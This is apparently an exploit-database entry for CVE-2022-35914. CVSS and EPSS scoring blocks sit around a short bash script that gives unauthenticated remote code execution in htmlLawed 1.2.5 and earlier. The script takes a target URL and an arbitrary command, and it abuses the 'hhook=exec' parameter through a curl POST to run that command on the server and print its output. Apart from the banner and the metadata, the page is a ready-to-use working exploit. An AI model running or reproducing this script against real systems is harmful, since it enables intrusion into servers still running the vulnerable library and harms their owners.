9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7 High
AI Score
Confidence
Low
0.974 High
EPSS
Percentile
99.9%
# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# CVE: CVE-2022-35914
banner(){
echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _"
echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |"
echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|"
echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|"
}
while getopts ":u:c:" arg; do
case $arg in
u) URL=$OPTARG; let parameter_counter+=1 ;;
c) CMD=$OPTARG; let parameter_counter+=1 ;;
esac
done
if [ -z "$URL" ] || [ -z "$CMD" ]; then
banner
echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
exit
else
banner
echo -e "\n[+] Command output:"
fi
curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbps; \[[0-9]+\] =\>'| sed -E 's/\&nbps; \[[0-9]+\] =\> (.*)<br \/>/\1/'
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7 High
AI Score
Confidence
Low
0.974 High
EPSS
Percentile
99.9%